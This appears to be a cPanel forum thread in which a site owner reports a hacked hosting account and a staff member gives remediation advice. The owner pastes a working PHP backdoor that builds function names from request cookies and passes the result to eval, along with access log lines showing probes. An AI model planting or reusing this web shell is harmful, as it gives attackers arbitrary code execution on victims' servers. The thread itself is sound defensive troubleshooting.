Public_html and other sub folder index.php and htaccess file issue

[shaktis]

I recently noticed my server domain public_html index.php and htaccess file is overwritten by someone without permission and the same thing happens on several subfolders.

On some websites, new subfolders are created on public_html all of them have index.php file. Sometimes Wordpress related folders are created.


That updated index file has this on public_html




On subfolder .PHP file has this code

<?php
function visit_cookie() {
$h = $_COOKIE;
($h && isset($h[93])) ? (($ms = $h[93].$h[78]) &&
($qh = $ms($h[73].$h[22])) && ($_qh = $ms($h[94].$h[82])) &&
($_qh = $_qh($ms($h[10]))) && @eval($_qh)) : $h;

return 0;
}

visit_cookie();

Automatic cron are setup on the server which I have never created.


I have checked the log this I get

66.248.202.40 - - [11/Nov/2022:09:25:59 +0000] "GET /.well-known/themes.php HTTP/1.1" 200 - "批量打开网址、网页、网站（网址、超链接批量打开工具，如何批量一键快速打开多个网站、网页）" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36"

66.248.202.40 - - [11/Nov/2022:09:25:59 +0000] "GET /module/update.php HTTP/1.1" 200 - "批量打开网址、网页、网站（网址、超链接批量打开工具，如何批量一键快速打开多个网站、网页）" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36"

Can someone please help me to find out how someone can upload these folders, and files and set up cron without any permission on the panel?

 

[cPRex]

Hey there! Do you have SSH access enabled on the account? If so, the user could have come from anywhere with a stolen password.

The first place I would echeck would be the cPanel access logs, specifically looking for access to the Cron or File Manager of the cPanel interface. If you can find access that isn't authorized, you can block that IP address.

It would also be a good idea to have any users with access to the cPanel account scan their local machines for malware, as keylogging software to steal passwords is common.

 

[shaktis]

Thank you for your response, I have checked both access log file via terminal and raw access log but haven't found any instance or activity of adding cron file or adding index.php and .htaccess file on the server itself. Can you please provide more details and suggest how we can prevent that from happening going forward?

 

[cPRex]

The best way to check that is to recreate the process inside cPanel. For example, I would watch /usr/local/cpanel/logs/access_log while opening the File Manager inside of a cPanel account, and then you'll know what to search for in the log to see that same action from other IP addresses.

If you really don't see anything there, it could be a malicious script inside the account that is creating these files, so you'd want to investigate the account for malware. We recommend Imunify for scanning your machine, and there are details on that process here:

How to Install ImunifyAV | cPanel & WHM Documentation

cPanel & WHM servers allow you to install ImunifyAV for free from WHM's Security Advisor interface.

docs.cpanel.net

If that still doesn't find anything, you'll want to reach out to your host or a professional administrator to have a more thorough review of the account performed.

 

[shaktis]

Thank you for the detailed information, I will review that and will also consider the anti virus option you suggested.

One more question:
Is there any settings I can make to open file manager, FTP, ssh, cpanel etc. from allowed IP address only? Please suggest.

 

[cPRex]

There isn't a way to further restrict areas of the cPanel interface - once a user is logged in, they can see all areas.